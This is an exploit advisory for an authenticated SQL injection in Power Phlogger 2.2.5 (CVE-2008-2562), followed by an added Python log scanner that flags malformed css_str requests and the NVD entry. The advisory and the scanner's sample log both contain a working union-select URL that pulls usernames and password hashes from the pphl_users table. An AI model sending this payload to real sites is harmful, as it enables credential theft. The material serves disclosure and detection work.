Power Phlogger 2.2.5 css_str SQL Injection Vulnerability
2008-06-05T00:00:00
ID: EDB-ID:5744 | Type: exploitdb | Reporter: MustLive | Modified: 2008-06-05T00:00:00
Description
Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability. CVE-2008-2562. Webapps exploit for php platform
############################################################
SQL Injection vulnerability in Power Phlogger
By MustLive (http://websecurity.com.ua)
Detailed information: http://websecurity.com.ua/2158/
Description: SQL Injection vulnerability in Power Phlogger (a PHP/MySQL logging tool that tracks hits via counters). To carry out the SQL Injection you need to be logged into an account, which can be freely obtained via the open registration form.
SQL Injection:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
With this query you will receive the id, login and password (hash) of the first user.
Vulnerable versions are Power Phlogger <= 2.2.5.
############################################################
# milw0rm.com [2008-06-05]
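An added detection example, not part of the original advisory and not Power Phlogger's own code: it scans constructed access-log lines for edCss.php requests whose css_str is not the bare numeric id the edit action expects, which is exactly the shape of the query shown above. The log lines, the regexes and the function names are assumptions made for this example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not real Power Phlogger output).
# The second line carries the query from the advisory above.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2008:10:00:01 +0000] "GET /edCss.php?css_str=3&action=edit HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2008:10:00:07 +0000] "GET /edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit HTTP/1.1" 200 2048
10.0.0.9 - - [05/Jun/2008:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(union|select|from|limit)\b", re.IGNORECASE)

def css_str_is_well_formed(value: str) -> bool:
    """Assumption: the edit action only needs a bare integer id in css_str."""
    return re.fullmatch(r"-?\d+", value.strip()) is not None

def check_request(target: str) -> Optional[dict]:
    """Return a finding for an edCss.php request with a malformed css_str, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/edCss.php"):
        return None
    # parse_qs already percent-decodes values, so %20 becomes a space here.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("css_str", []):
        if not css_str_is_well_formed(value):
            return {
                "param": "css_str",
                "value": value,
                "sql_keywords": sorted({m.lower() for m in SQL_HINT_RE.findall(value)}),
                "action": params.get("action", [""])[0],
            }
    return None

def scan_log(text: str) -> list:
    """Run check_request over every request line and attach the client address."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = check_request(m.group("target"))
        if finding:
            finding["client"] = line.split(" ", 1)[0]
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same well-formedness check, applied server-side before css_str reaches the query, is the mitigation the advisory implies: the parameter should never be accepted as anything but an integer.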
NVD entry for CVE-2008-2562 (published 2008-06-06, modified 2017-09-29): SQL injection vulnerability in edCss.php in PowerPhlogger 2.2.5 and earlier allows remote authenticated users to execute arbitrary SQL commands via the css_str parameter in an edit action. CVSS 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P). https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2562